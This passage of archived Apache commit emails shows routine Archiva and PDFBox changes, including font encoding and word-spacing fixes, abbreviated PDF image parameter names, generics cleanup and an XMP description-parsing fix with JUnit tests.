/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/ShowArtifactActionTest.java Date: Thu, 25 Feb 2010 10:32:41 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: oching Date: Thu Feb 25 10:32:40 2010 New Revision: 916227 URL: http://svn.apache.org/viewvc?rev=916227&view=rev Log: remove unused imports Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/ShowArtifactActionTest.java Modified: archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/ShowArtifactActionTest.java URL: http://svn.apache.org/viewvc/archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/ShowArtifactActionTest.java?rev=916227&r1=916226&r2=916227&view=diff ============================================================================== --- archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/ShowArtifactActionTest.java (original) +++ archiva/branches/archiva-1.3.x/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/ShowArtifactActionTest.java Thu Feb 25 10:32:40 2010 @@ -38,10 +38,7 @@ import org.apache.maven.archiva.model.Organization; import org.apache.maven.archiva.model.Scm; import org.apache.maven.archiva.model.VersionedReference; -import org.apache.maven.archiva.security.UserRepositories; -import org.apache.maven.archiva.security.UserRepositoriesStub; import org.apache.maven.archiva.web.action.admin.repositories.ArchivaDAOStub; -import org.codehaus.plexus.spring.PlexusInSpringTestCase; import org.easymock.MockControl; public class ShowArtifactActionTest
From [email protected] Tue Nov 02 15:17:22 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75084 invoked from network); 2 Nov 2010 15:17:22 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 2 Nov 2010 15:17:22 -0000 Received: (qmail 72221 invoked by uid 500); 2 Nov 2010 15:17:54 -0000 Delivered-To: [email protected] Received: (qmail 72159 invoked by uid 500); 2 Nov 2010 15:17:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 72145 invoked by uid 99); 2 Nov 2010 15:17:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Nov 2010 15:17:52 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Nov 2010 15:17:50 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0AEBB23889B3; Tue, 2 Nov 2010 15:16:36 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1030082 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java Date: Tue, 02 Nov 2010 15:16:35 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: lehmi Date: Tue Nov 2 15:16:35 2010 New Revision: 1030082 URL: http://svn.apache.org/viewvc?rev=1030082&view=rev Log: PDFBOX-883: do not create an AFMEncoding if there is already another font encoding Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java?rev=1030082&r1=1030081&r2=1030082&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDFont.java Tue Nov 2 15:16:35 2010 @@ -270,7 +270,7 @@ public abstract class PDFont implements cmap = cmapObjects.get( cmapName ); } FontMetric metric = getAFM(); - if( metric != null ) + if( metric != null && fontEncoding == null) { fontEncoding = new AFMEncoding( metric ); } From [email protected] Fri Nov 05 01:25:46 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37804 invoked from network); 5 Nov 2010 01:25:46 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Nov 2010 01:25:46 -0000 Received: (qmail 99127 invoked by uid 500); 5 Nov 2010 01:26:17 -0000 Delivered-To: [email protected] Received: (qmail 99100 invoked by uid 500); 5 Nov 2010 01:26:17 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99093 invoked by uid 99); 5 Nov 2010 01:26:17 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Nov 2010 01:26:17 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Nov 2010 01:26:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 2844023889E1; Fri, 5 Nov 2010 01:25:03 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1031388 - in /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox: cos/COSDictionary.java filter/CCITTFaxDecodeFilter.java Date: Fri, 05 Nov 2010 01:25:03 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Fri Nov 5 01:25:02 2010 New Revision: 1031388 URL: http://svn.apache.org/viewvc?rev=1031388&view=rev Log: PDFBOX-887: added the usage of abbreviated names for image parameters Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/cos/COSDictionary.java pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/filter/CCITTFaxDecodeFilter.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/cos/COSDictionary.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/cos/COSDictionary.java?rev=1031388&r1=1031387&r2=1031388&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/cos/COSDictionary.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/cos/COSDictionary.java Fri Nov 5 01:25:02 2010 @@ -149,6 +149,8 @@ public class COSDictionary extends COSBa * @param secondKey The second key to try. * * @return The object that matches the key. + * + * @deprecated use {@link #getDictionaryObject(COSName, COSName)} using COSName constants instead */ public COSBase getDictionaryObject( String firstKey, String secondKey ) { @@ -168,6 +170,28 @@ public class COSDictionary extends COSBa * dereference it and get it from the document. If the object is COSNull then * null will be returned. * + * @param firstKey The first key to try. + * @param secondKey The second key to try. + * + * @return The object that matches the key. + */ + public COSBase getDictionaryObject( COSName firstKey, COSName secondKey ) + { + COSBase retval = getDictionaryObject( firstKey ); + if( retval == null && secondKey != null) + { + retval = getDictionaryObject( secondKey ); + } + return retval; + } + /** + * This is a special case of getDictionaryObject that takes multiple keys, it will handle + * the situation where multiple keys could get the same value, ie if either CS or ColorSpace + * is used to get the colorspace. + * This will get an object from this dictionary. If the object is a reference then it will + * dereference it and get it from the document. If the object is COSNull then + * null will be returned. + * * @param keyList The list of keys to find a value. * * @return The object that matches the key. @@ -902,8 +926,23 @@ public class COSDictionary extends COSBa */ public boolean getBoolean( COSName key, boolean defaultValue ) { + return getBoolean( key, null, defaultValue); + } + + /** + * This is a convenience method that will get the dictionary object that + * is expected to be a COSBoolean and convert it to a primitive boolean. + * + * @param firstKey The first key to the item in the dictionary. + * @param secondKey The second key to the item in the dictionary. + * @param defaultValue The value returned if the entry is null. + * + * @return The entry converted to a boolean. + */ + public boolean getBoolean( COSName firstKey, COSName secondKey, boolean defaultValue ) + { boolean retval = defaultValue; - COSBase bool = getDictionaryObject( key ); + COSBase bool = getDictionaryObject( firstKey, secondKey ); if( bool != null && bool instanceof COSBoolean) { retval = ((COSBoolean)bool).getValue(); @@ -1041,8 +1080,37 @@ public class COSDictionary extends COSBa */ public int getInt( COSName key, int defaultValue ) { + return getInt( key, null, defaultValue); + } + + /** + * This is a convenience method that will get the dictionary object that + * is expected to be an integer. If the dictionary value is null then the + * default Value -1 will be returned. + * + * @param firstKey The first key to the item in the dictionary. + * @param secondKey The second key to the item in the dictionary. + * @return The integer value. + */ + public int getInt( COSName firstKey, COSName secondKey ) + { + return getInt( firstKey, secondKey, -1 ); + } + + /** + * This is a convenience method that will get the dictionary object that + * is expected to be an integer. If the dictionary value is null then the + * default Value will be returned. + * + * @param firstKey The first key to the item in the dictionary. + * @param secondKey The second key to the item in the dictionary. + * @param defaultValue The value to return if the dictionary item is null. + * @return The integer value. + */ + public int getInt( COSName firstKey, COSName secondKey, int defaultValue ) + { int retval = defaultValue; - COSBase obj = getDictionaryObject( key ); + COSBase obj = getDictionaryObject( firstKey, secondKey ); if( obj != null && obj instanceof COSNumber) { retval = ((COSNumber)obj).intValue(); Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/filter/CCITTFaxDecodeFilter.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/filter/CCITTFaxDecodeFilter.java?rev=1031388&r1=1031387&r2=1031388&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/filter/CCITTFaxDecodeFilter.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/filter/CCITTFaxDecodeFilter.java Fri Nov 5 01:25:02 2010 @@ -72,7 +72,7 @@ public class CCITTFaxDecodeFilter implem throws IOException { // Get ImageParams from PDF - COSBase baseObj = options.getDictionaryObject(new String[] {"DecodeParms","DP"}); + COSBase baseObj = options.getDictionaryObject(COSName.DECODE_PARMS, COSName.DP); COSDictionary dict = null; if( baseObj instanceof COSDictionary ) { @@ -100,9 +100,15 @@ public class CCITTFaxDecodeFilter implem + baseObj.getClass().getName() ); } - int width = options.getInt(COSName.WIDTH); - int height = options.getInt(COSName.HEIGHT); + int width = options.getInt(COSName.WIDTH, COSName.W); + int height = options.getInt(COSName.HEIGHT, COSName.H); int length = options.getInt(COSName.LENGTH); + // if the length isn't given within the dictionary, + // the length of the inputstream is used + if (length == -1) + { + length = compressedData.available(); + } int compressionType = dict.getInt(COSName.K); boolean blackIs1 = dict.getBoolean(COSName.BLACK_IS_1, false); From [email protected] Fri Nov 05 13:11:30 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5426 invoked from network); 5 Nov 2010 13:11:29 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Nov 2010 13:11:29 -0000 Received: (qmail 90845 invoked by uid 500); 5 Nov 2010 13:12:01 -0000 Delivered-To: [email protected] Received: (qmail 90812 invoked by uid 500); 5 Nov 2010 13:12:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90805 invoked by uid 99); 5 Nov 2010 13:11:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Nov 2010 13:11:59 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Nov 2010 13:11:58 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 3459623889ED; Fri, 5 Nov 2010 13:10:45 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1031549 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripperByArea.java Date: Fri, 05 Nov 2010 13:10:45 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: lehmi Date: Fri Nov 5 13:10:44 2010 New Revision: 1031549 URL: http://svn.apache.org/viewvc?rev=1031549&view=rev Log: PDFBOX-885: added two constructors from the superclass as proposed by Tim Stavenger, also added some java5 generics stuff Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripperByArea.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripperByArea.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripperByArea.java?rev=1031549&r1=1031548&r2=1031549&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripperByArea.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFTextStripperByArea.java Fri Nov 5 13:10:44 2010 @@ -24,6 +24,7 @@ import java.util.HashMap; import java.util.Iterator; import java.util.List; import java.util.Map; +import java.util.Properties; import java.util.Vector; import org.apache.pdfbox.cos.COSStream; @@ -38,10 +39,11 @@ import org.apache.pdfbox.pdmodel.common. */ public class PDFTextStripperByArea extends PDFTextStripper { - private List regions = new ArrayList(); - private Map regionArea = new HashMap(); - private Map regionCharacterList = new HashMap(); - private Map regionText = new HashMap(); + private List<String> regions = new ArrayList<String>(); + private Map<String,Rectangle2D> regionArea = new HashMap<String,Rectangle2D>(); + private Map<String,Vector<ArrayList<TextPosition>>> regionCharacterList = + new HashMap<String,Vector<ArrayList<TextPosition>>>(); + private Map<String,StringWriter> regionText = new HashMap<String,StringWriter>(); /** * Constructor. @@ -53,7 +55,42 @@ public class PDFTextStripperByArea exten setPageSeparator( "" ); } + /** + * Instantiate a new PDFTextStripperArea object. Loading all of the operator + * mappings from the properties object that is passed in. Does not convert + * the text to more encoding-specific output. + * + * @param props + * The properties containing the mapping of operators to + * PDFOperator classes. + * + * @throws IOException + * If there is an error reading the properties. + */ + public PDFTextStripperByArea(Properties props) throws IOException + { + super(props); + setPageSeparator(""); + } + + /** + * Instantiate a new PDFTextStripperArea object. This object will load + * properties from PDFTextStripper.properties and will apply + * encoding-specific conversions to the output text. + * + * @param encoding + * The encoding that the output will be written in. + * @throws IOException + * If there is an error reading the properties. + */ + public PDFTextStripperByArea(String encoding) throws IOException + { + super(encoding); + setPageSeparator(""); + } + + /** * Add a new region to group text by. * * @param regionName The name of the region. @@ -70,7 +107,7 @@ public class PDFTextStripperByArea exten * * @return A list of java.lang.String objects to identify the region names. */ - public List getRegions() + public List<String> getRegions() { return regions; } @@ -83,7 +120,7 @@ public class PDFTextStripperByArea exten */ public String getTextForRegion( String regionName ) { - StringWriter text = (StringWriter)regionText.get( regionName ); + StringWriter text = regionText.get( regionName ); return text.toString(); } @@ -95,16 +132,16 @@ public class PDFTextStripperByArea exten */ public void extractRegions( PDPage page ) throws IOException { - Iterator regionIter = regions.iterator(); + Iterator<String> regionIter = regions.iterator(); while( regionIter.hasNext() ) { setStartPage(getCurrentPageNo()); setEndPage(getCurrentPageNo()); //reset the stored text for the region so this class //can be reused. - String regionName = (String)regionIter.next(); - Vector regionCharactersByArticle = new Vector(); - regionCharactersByArticle.add( new ArrayList() ); + String regionName = regionIter.next(); + Vector<ArrayList<TextPosition>> regionCharactersByArticle = new Vector<ArrayList<TextPosition>>(); + regionCharactersByArticle.add( new ArrayList<TextPosition>() ); regionCharacterList.put( regionName, regionCharactersByArticle ); regionText.put( regionName, new StringWriter() ); } @@ -123,11 +160,11 @@ public class PDFTextStripperByArea exten */ protected void processTextPosition( TextPosition text ) { - Iterator regionIter = regionArea.keySet().iterator(); + Iterator<String> regionIter = regionArea.keySet().iterator(); while( regionIter.hasNext() ) { - String region = (String)regionIter.next(); - Rectangle2D rect = (Rectangle2D)regionArea.get( region ); + String region = regionIter.next(); + Rectangle2D rect = regionArea.get( region ); if( rect.contains( text.getX(), text.getY() ) ) { charactersByArticle = (Vector)regionCharacterList.get( region ); @@ -144,12 +181,12 @@ public class PDFTextStripperByArea exten */ protected void writePage() throws IOException { - Iterator regionIter = regionArea.keySet().iterator(); + Iterator<String> regionIter = regionArea.keySet().iterator(); while( regionIter.hasNext() ) { - String region = (String)regionIter.next(); + String region = regionIter.next(); charactersByArticle = (Vector)regionCharacterList.get( region ); - output = (StringWriter)regionText.get( region ); + output = regionText.get( region ); super.writePage(); } } From [email protected] Fri Nov 05 14:26:48 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42259 invoked from network); 5 Nov 2010 14:26:48 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Nov 2010 14:26:48 -0000 Received: (qmail 11533 invoked by uid 500); 5 Nov 2010 14:27:20 -0000 Delivered-To: [email protected] Received: (qmail 11502 invoked by uid 500); 5 Nov 2010 14:27:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11495 invoked by uid 99); 5 Nov 2010 14:27:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Nov 2010 14:27:18 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Nov 2010 14:27:15 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id DA76923889E3; Fri, 5 Nov 2010 14:26:00 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Subject: svn commit: r1031580 - /pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Date: Fri, 05 Nov 2010 14:26:00 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: lehmi Date: Fri Nov 5 14:26:00 2010 New Revision: 1031580 URL: http://svn.apache.org/viewvc?rev=1031580&view=rev Log: PDFBOX-881: added an improved word spacing calculation as proposed by David Rodríguez Alfayate Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Modified: pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java?rev=1031580&r1=1031579&r2=1031580&view=diff ============================================================================== --- pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java (original) +++ pdfbox/trunk/pdfbox/src/main/java/org/apache/pdfbox/util/PDFStreamEngine.java Fri Nov 5 14:26:00 2010 @@ -335,11 +335,13 @@ public class PDFStreamEngine //were a single byte will result in two output characters "fi" final PDFont font = graphicsState.getTextState().getFont(); + // TODO move that to PDFont + boolean isType3Font = font instanceof PDType3Font; PDMatrix fontMatrix = font.getFontMatrix(); //This will typically be 1000 but in the case of a type3 font //this might be a different number - final float glyphSpaceToTextSpaceFactor = 1f/font.getFontMatrix().getValue( 0, 0 ); + final float glyphSpaceToTextSpaceFactor = 1f/fontMatrix.getValue( 0, 0 ); float spaceWidthText=0; try { @@ -391,7 +393,7 @@ public class PDFStreamEngine // get the width and height of this character in text units float characterHorizontalDisplacementText = font.getFontWidth( string, i, codeLength ); // Type3 fonts are providing the width of a character in glyph space units - if (font instanceof PDType3Font) + if (isType3Font) { // multiply the witdh with the scaling factor of the font matrix characterHorizontalDisplacementText = characterHorizontalDisplacementText * fontMatrix.getValue(0, 0); @@ -430,23 +432,28 @@ public class PDFStreamEngine spacingText += wordSpacingText; } // Convert textMatrix to display units - Matrix textMatrixStart = textStateParameters.copy().multiply(textMatrix).multiply(getGraphicsState().getCurrentTransformationMatrix()); + Matrix textMatrixStart = textStateParameters.multiply(textMatrix).multiply(getGraphicsState().getCurrentTransformationMatrix()); // TODO : tx should be set for horizontal text and ty for vertical text // which seems to be specified in the font (not the direction in the matrix). - float tx = ((characterHorizontalDisplacementText)*fontSizeText+characterSpacingText+spacingText)*horizontalScalingText; + float tx = ((characterHorizontalDisplacementText)*fontSizeText)*horizontalScalingText; float ty = 0; - Matrix td = new Matrix(); td.setValue( 2, 0, tx ); td.setValue( 2, 1, ty ); - textMatrix = td.multiply( textMatrix ); - // The text matrix gets updated after each glyph is placed. The updated // version will have the X and Y coordinates for the next glyph. - Matrix textMatrixEnd = textStateParameters.copy().multiply(textMatrix.copy()).multiply(getGraphicsState().getCurrentTransformationMatrix()); + // textMatrixEnd contains the coordinates of the end of the last glyph without + // taking characterSpacingText and spacintText into account, otherwise it'll be + // impossible to detect new words within text extraction + Matrix textMatrixEnd = textStateParameters.multiply(td).multiply(textMatrix).multiply(getGraphicsState().getCurrentTransformationMatrix()); + // add some spacing to the text matrix (see comment above) + tx = ((characterHorizontalDisplacementText)*fontSizeText+characterSpacingText+spacingText)*horizontalScalingText; + td.setValue( 2, 0, tx ); + textMatrix = td.multiply( textMatrix ); + // determine the width of this character // XXX: Note that if we handled vertical text, we should be using Y here float widthText = textMatrixEnd.getXPosition() - textMatrixStart.getXPosition(); From [email protected] Thu Nov 11 20:34:19 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9074 invoked from network); 11 Nov 2010 20:34:19 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 11 Nov 2010 20:34:19 -0000 Received: (qmail 33157 invoked by uid 500); 11 Nov 2010 20:34:50 -0000 Delivered-To: [email protected] Received: (qmail 33146 invoked by uid 500); 11 Nov 2010 20:34:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.pdfbox.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33139 invoked by uid 99); 11 Nov 2010 20:34:50 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Nov 2010 20:34:50 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 11 Nov 2010 20:34:49 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id A89102388A02; Thu, 11 Nov 2010 20:33:35 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r1034104 - in /pdfbox/trunk/jempbox/src: main/java/org/apache/jempbox/xmp/XMPSchema.java test/java/org/apache/jempbox/xmp/XMPMetadataTest.java Date: Thu, 11 Nov 2010 20:33:35 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: adam Date: Thu Nov 11 20:33:35 2010 New Revision: 1034104 URL: http://svn.apache.org/viewvc?rev=1034104&view=rev Log: PDFBOX-806: Failure to extract dc:description when the value is the node text Applied patch and JUnit test cases contributed by Staffan Olsson Added: pdfbox/trunk/jempbox/src/test/java/org/apache/jempbox/xmp/XMPMetadataTest.java Modified: pdfbox/trunk/jempbox/src/main/java/org/apache/jempbox/xmp/XMPSchema.java Modified: pdfbox/trunk/jempbox/src/main/java/org/apache/jempbox/xmp/XMPSchema.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/jempbox/src/main/java/org/apache/jempbox/xmp/XMPSchema.java?rev=1034104&r1=1034103&r2=1034104&view=diff ============================================================================== --- pdfbox/trunk/jempbox/src/main/java/org/apache/jempbox/xmp/XMPSchema.java (original) +++ pdfbox/trunk/jempbox/src/main/java/org/apache/jempbox/xmp/XMPSchema.java Thu Nov 11 20:33:35 2010 @@ -820,6 +820,10 @@ public class XMPSchema } } } + else if (property.getChildNodes().getLength() == 1 && Node.TEXT_NODE == property.getFirstChild().getNodeType()) + { + retval = property.getFirstChild().getNodeValue(); + } } return retval; } Added: pdfbox/trunk/jempbox/src/test/java/org/apache/jempbox/xmp/XMPMetadataTest.java URL: http://svn.apache.org/viewvc/pdfbox/trunk/jempbox/src/test/java/org/apache/jempbox/xmp/XMPMetadataTest.java?rev=1034104&view=auto ============================================================================== --- pdfbox/trunk/jempbox/src/test/java/org/apache/jempbox/xmp/XMPMetadataTest.java (added) +++ pdfbox/trunk/jempbox/src/test/java/org/apache/jempbox/xmp/XMPMetadataTest.java Thu Nov 11 20:33:35 2010 @@ -0,0 +1,85 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package org.apache.jempbox.xmp; + +import java.io.IOException; +import java.io.StringReader; + +import junit.framework.TestCase; + +import org.xml.sax.InputSource; + +public class XMPMetadataTest extends TestCase { + + public void testLoadDublincoreExample() throws IOException { + // http://dublincore.org/documents/dcmes-xml/ + // had to move the dc namespace declaration to get it parsed + String xmpmeta = "<x:xmpmeta xmlns:x=\"adobe:ns:meta/\">\n" + + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"\n" + + //" xmlns:dc=\"http://purl.org/dc/elements/1.1/\">" + + ">" + + " <rdf:Description\n" + + //">" + + " xmlns:dc=\"http://purl.org/dc/elements/1.1/\">" + + " <dc:title>The Mona Lisa</dc:title>\n" + + " <dc:description>A painting by ...</dc:description>\n" + + " </rdf:Description>\n" + + " </rdf:RDF>\n" + + "</x:xmpmeta>"; + XMPMetadata xmp = XMPMetadata.load(new InputSource(new StringReader(xmpmeta))); + XMPSchemaDublinCore dc = xmp.getDublinCoreSchema(); + assertEquals("The Mona Lisa", dc.getTitle()); + assertEquals("A painting by ...", dc.getDescription()); + } + + public void testExiv2Xmp() throws IOException { + // XMP block as created by exiv2 + String xmpmeta = "<x:xmpmeta xmlns:x=\"adobe:ns:meta/\" x:xmptk=\"XMP Core 4.4.0-Exiv2\">\n" + + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\">\n" + + " <rdf:Description rdf:about=\"\"\n" + + " xmlns:dc=\"http://purl.org/dc/elements/1.1/\">\n" + + " <dc:description>\n" + + " <rdf:Alt>\n" + + " <rdf:li xml:lang=\"x-default\">Dublin Core description</rdf:li>\n" + + " </rdf:Alt>\n" + + " </dc:description>\n" + + " </rdf:Description>\n" + + " </rdf:RDF>\n" + + "</x:xmpmeta>"; + XMPMetadata xmp = XMPMetadata.load(new InputSource(new StringReader(xmpmeta))); + assertEquals("Dublin Core description", xmp.getDublinCoreSchema().getDescription()); + } + + public void testDescriptionFromNodeText() throws IOException { + // From a jpeg, valid according to http://www.w3.org/RDF/Validator/ + String xmpmeta = "<x:xmpmeta xmlns:x=\"adobe:ns:meta/\" x:xmptk=\"XMP Core 4.4.0\">\n" + + " <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\">\n" + + " <rdf:Description rdf:about=\"\"\n" + + " xmlns:exif=\"http://ns.adobe.com/exif/1.0/\">\n" + + " <exif:UserComment>exif</exif:UserComment>\n" + + " </rdf:Description>\n" + + " <rdf:Description rdf:about=\"\"\n" + + " xmlns:dc=\"http://purl.org/dc/elements/1.1/\">\n" + + " <dc:description>Dublin Core description</dc:description>\n" + + " </rdf:Description>\n" + + " </rdf:RDF>\n" + + "</x:xmpmeta>"; + XMPMetadata xmp = XMPMetadata.load(new InputSource(new StringReader(xmpmeta))); + assertEquals("Dublin Core description", xmp.getDublinCoreSchema().getDescription()); + } + +} From [email protected] Fri Nov 19 22:40:44 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38782 invoked from network); 19 Nov 2010 22:40:43 -0000 Received: from unknown (HELO 